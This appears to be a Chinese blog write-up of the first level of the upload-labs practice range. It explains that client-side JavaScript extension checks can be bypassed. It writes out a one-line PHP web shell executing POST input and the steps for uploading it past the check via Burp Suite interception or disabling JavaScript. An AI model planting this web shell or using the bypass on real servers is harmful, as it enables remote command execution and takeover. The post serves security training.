uploadlabs-1

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

lastIndexOf(“.”)函数的作用是“获取程序后缀”

虽然给了代码,但是光看这些代码还是不够的,必须要结合html看才行

1
2
3
4
5
6
<h3>上传区</h3>
            <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                <p>请选择要上传的图片:<p>
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="上传"/>
            </form>

在HTML中,我们看见checkFile()函数主要影响的是post时的onsubmit,相当于只有通过check才会构建post包进行上传。
这就是俗称的“前端检测”
个人认为,一般来说“前后端检测”的差别定义为“前端脚本(html,js)”和“后端脚本(php)”的区别,感觉也可以以构建数据包为分界,构建前检测的是“前端”,构建后检测的为“后端”。

既然这是一个前端脚本,那我们的目的只是绕过构筑数据包之前的部分。
所以先写一个一句话木马:<?php @system($_POST['a']);?>
然后把文件的后缀改为png
上传以后通过burpsuite抓包,将后缀改成php发送

用蚁剑连接成功

当然,这既然是前端脚本,而且是js,那就直接“禁用js”就行了

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家